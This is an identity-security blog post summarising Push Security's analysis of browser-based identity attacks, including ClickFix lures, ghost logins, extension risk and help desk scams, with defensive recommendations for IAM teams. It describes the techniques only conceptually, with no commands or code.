Browser-based identity attacks are reshaping enterprise IAM

At a glance

What this is: This is a Push Security analysis of 2025 browser-based identity attacks and the controls it built to detect phishing, ClickFix, stolen credentials, ghost logins, extensions, and help desk scams.

Why it matters: It matters because IAM, PAM, and NHI teams are now defending the browser as an identity control point, where account takeover, session theft, and delegated access abuse increasingly bypass traditional perimeter assumptions.

By the numbers:

• Identity-based attacks surged by 32% over the last year.
• ClickFix was the most common initial point of access for adversaries in the past year, accounting for 47% of observed attacks.
• In the last year-plus, 79% of detections were malware-free, up from 40% in 2019.

👉 Read Push Security's analysis of browser-based identity attacks and the new controls built around them

Context

Browser-based identity attacks are techniques that use the browser itself as the path to account takeover, credential theft, or session abuse. The article argues that this is now a mainstream problem for identity security because attackers increasingly exploit legitimate services, phishing kits, help desk workflows, and browser-native lures rather than relying on endpoint malware alone.

For IAM and identity governance teams, the shift matters because the browser is where users authenticate, approve, copy credentials, and reach business apps. That makes it a control plane for human identity and, by extension, for the workloads, integrations, and delegated access paths that depend on those credentials.

Key questions

Q: How should security teams reduce browser-based account takeover risk?

A: Security teams should treat the browser as an identity enforcement point, not just a user interface. Focus on phishing detection that understands page behaviour, enforce MFA and federated login on critical apps, block malicious clipboard activity, and govern extensions and browser profiles. The goal is to reduce the number of usable paths an attacker can exploit after a single lure or credential leak.

Q: Why do browser-based attacks bypass traditional identity controls so often?

A: They succeed because many controls were built for the login event, while the attack happens around the login event. Attackers use legitimate services, trusted lookalikes, direct app logins, and browser prompts to make the user part of the access path. If identity governance does not cover the browser layer, an attacker can obtain valid credentials or sessions without breaking central authentication.

Q: What breaks when organisations rely on passwords and MFA alone?

A: Passwords and MFA reduce some risk, but they do not stop credential reuse, session theft, malicious browser extensions, or help desk social engineering. Once an attacker has a valid session or a reused password, they can move into business apps that still accept direct login. Effective control requires visibility into where credentials are entered and where sessions can be reused.

Q: Who is accountable when a help desk scam leads to account takeover?

A: Accountability is shared across identity, support, and application owners. The help desk owns the verification process, IAM owns the policy for resets and MFA changes, and application owners own whether direct login paths and recovery flows are too permissive. If any one of those layers is weak, a scam can turn into an enterprise-wide access event.

Technical breakdown

Browser-based phishing evasion and real-time context analysis

Modern phishing does not depend only on suspicious domains or obvious fake login pages. The article describes how attackers use legitimate services, SEO poisoning, malvertising, cross-domain iframes, single-use links, and OpenID Connect flows to make malicious pages look normal long enough for a user to authenticate. That breaks legacy detection that relies on reputation alone. The technical problem is not only where the page lives, but how the browser renders trust, identity prompts, and content in real time.

Practical implication: teams need browser-level detection that evaluates page behaviour, not just static indicators.

ClickFix and malicious copy-paste as a browser-native attack path

ClickFix-style attacks turn a browser prompt into local code execution by tricking users into copying and running malicious commands. The lure often looks like a CAPTCHA or troubleshooting step, so the attack sits between social engineering and execution. Once payloads run, attackers typically aim for infostealers or remote access software that can harvest session cookies and credentials. This is hard to contain after the fact because the initial interaction happens in the browser, while the compromise may surface later in endpoint telemetry or account abuse.

Practical implication: block malicious clipboard actions before code reaches the endpoint, not after execution.

Stolen credentials, ghost logins, and browser extension risk

The article ties together several identity abuse paths: stolen credentials used against apps like Jira, ghost logins where users authenticate directly to apps that should be federated, and malicious or compromised browser extensions. These are different mechanisms, but they all exploit weak identity enforcement at the browser layer. If MFA is missing, passwords are reused, or extensions are over-permissioned, the attacker gets a usable login path without needing to defeat the core identity provider first.

Practical implication: enforce federation, MFA, and extension governance across every user app, not just the IdP.

Threat narrative

Attacker objective: The attacker wants durable access to business applications and sessions that can be monetised through data theft, extortion, or broader account takeover.

1. Entry begins in the browser through phishing, malvertising, SEO poisoning, or malicious copy-and-paste lures that look like normal login or troubleshooting flows.
2. Escalation occurs when the attacker captures credentials, session cookies, or local access through stolen logins, ClickFix execution, ghost logins, or compromised browser extensions.
3. Impact follows when the attacker reuses those identities to access business apps, dump data, hold it for ransom, or expand the blast radius across shared passwords and connected services.

Breaches seen in the wild

• Cisco Active Directory credentials breach — Kraken ransomware group leaked Cisco Active Directory credentials.
• MongoBleed breach — MongoBleed exposed secrets across 87K MongoDB servers.

Read our 52 NHI Breaches Analysis report for a comprehensive view of breaches impacting Non-Human Identities including AI Agents.

NHI Mgmt Group analysis

Browser-based identity attack is now the right category for this problem. The article is not describing isolated phishing or endpoint malware trends. It is showing that the browser has become the place where identity trust is created, abused, and extended across apps, sessions, and help desk workflows. That makes browser security an identity governance issue, not just a user protection issue. Practitioners should treat the browser as a governed control surface, not a passive client.

Ghost logins expose a federation failure, not just a password problem. When users can still authenticate directly to valuable apps that should be behind SAML or OIDC, the environment has a parallel access path that identity governance does not fully own. This creates an accountability gap between central identity policy and app-level reality. The implication is that access governance must include the actual login method, not only the presence of an IdP.

Credential reuse converts one phished account into a broader identity event. The article's blast-radius discussion shows that a stolen browser credential can expose multiple apps when passwords are shared or synced across profiles. That is a governance problem because the control boundary is no longer the individual application. Practitioners need to map where browser authentication creates cross-app coupling, because that is where one compromise becomes many.

Help desk verification has become part of identity proofing, whether teams recognise it or not. The Marks & Spencer and Jaguar Land Rover cases show that support staff can become an access-control bypass if they do not have a reliable way to verify the person on the other end. That makes service desk identity checks a governance control, not an operational courtesy. Teams should treat assisted recovery and MFA reset paths as privileged workflows with explicit assurance requirements.

Browser telemetry creates an identity blast radius concept that most IAM programmes still lack. The most useful insight here is not simply that attacks are browser-based, but that the browser can reveal which accounts, apps, and sessions are adjacent to a compromise. That gives security teams a practical way to think about the spread of identity risk across the enterprise. The practitioner takeaway is to govern by blast radius, not by single-account events.

From our research:

• 80% of identity breaches involved compromised non-human identities such as service accounts and API keys, according to Ultimate Guide to NHIs.
• Only 20% have formal processes for offboarding and revoking API keys, and even fewer have procedures for rotating them, according to Ultimate Guide to NHIs.
• For a broader breach lens, see 52 NHI Breaches Analysis, which maps recurring identity failure patterns across real incidents.

What this signals

Browser-layer identity governance is becoming a practical control requirement, not an optional hardening task. As phishing kits, ClickFix lures, and ghost logins converge, teams will need policy that covers the browser, the IdP, and the application login path together. The programme signal is clear: if you cannot see where credentials are entered and reused, you cannot explain your blast radius after an attack.

Identity assurance is moving toward behaviour-aware enforcement. Static trust markers such as domain reputation are no longer enough when attackers abuse legitimate services and trusted login surfaces. Practitioners should expect more emphasis on browser telemetry, session context, extension governance, and help desk verification as part of a single access-risk model.

With 71% of NHIs not rotated within recommended time frames, per Ultimate Guide to NHIs , Static vs Dynamic Secrets, identity teams already struggle with lifecycle control across machine access. The browser trend extends that same governance problem into human access paths, where session persistence and credential reuse can spread compromise faster than review cycles can react.

For practitioners

• Govern the browser as an identity control plane Inventory which authentication, password entry, clipboard, extension, and help desk actions happen in the browser, then decide which of them must be centrally observed and blocked. Tie browser telemetry to account risk so identity teams can see when a user interaction becomes an access event.
• Remove ghost login paths from critical apps Find apps that still accept local credentials, especially where federation should be mandatory, and eliminate direct login options where possible. If exceptions remain, track them as explicit policy debt and review them alongside SSO coverage gaps and MFA gaps.
• Treat clipboard execution as a security boundary Block malicious copy-and-paste patterns before code reaches the endpoint, and capture the clipboard payload for investigation when a ClickFix-style lure is detected. This gives responders evidence at the point of user interaction instead of forcing them to reconstruct the attack after compromise.
• Enforce browser extension governance by permission and profile Review installed extensions, sideloaded installs, risky permissions, and company-domain browser profiles together rather than as separate issues. Extensions should be governed as identity-adjacent software because they can observe sessions, collect input, and weaken the assurance of the browser environment.

Key takeaways

• Browser-based attacks now exploit identity trust directly, so identity governance must extend into the browser rather than stopping at the login page.
• The evidence points to a broad shift away from malware-heavy intrusion and toward credential, session, and support-channel abuse that expands blast radius across apps.
• Teams that control federation, clipboard execution, extensions, and recovery workflows will reduce more account-takeover risk than teams that rely on user awareness alone.

Key terms

• Browser-based account takeover: A takeover pattern where the browser becomes the main path to steal credentials, sessions, or approval actions. Instead of attacking the endpoint first, the adversary uses phishing, trusted lookalikes, or malicious browser behaviour to obtain usable access to business applications.
• Ghost login: A direct application login that bypasses the intended federated identity path. It usually appears when users can still authenticate with local passwords on apps that should rely on SSO or OIDC, creating a shadow access route that weakens central policy and expands takeover risk.
• ClickFix attack: A social engineering technique that tricks a user into copying and running malicious commands from a browser page. The lure often looks like a CAPTCHA or help prompt, but the real objective is code execution that enables credential theft, session capture, or remote access.
• Browser extension governance: The practice of controlling which extensions users can install, what permissions they receive, and how they are monitored in managed browser profiles. In identity security, extensions matter because they can observe sessions, capture input, and weaken the trust boundary around authentication.

Deepen your knowledge

NHI governance, agentic AI identity, and machine identity lifecycle are core topics in our NHI Foundation Level course, the industry's only accredited NHI security programme. If you are responsible for identity security strategy or NHI governance in your organisation, it is worth exploring.

This post draws on content published by Push Security: browser-based identity attacks, ClickFix, stolen credentials, and help desk scams. Read the original.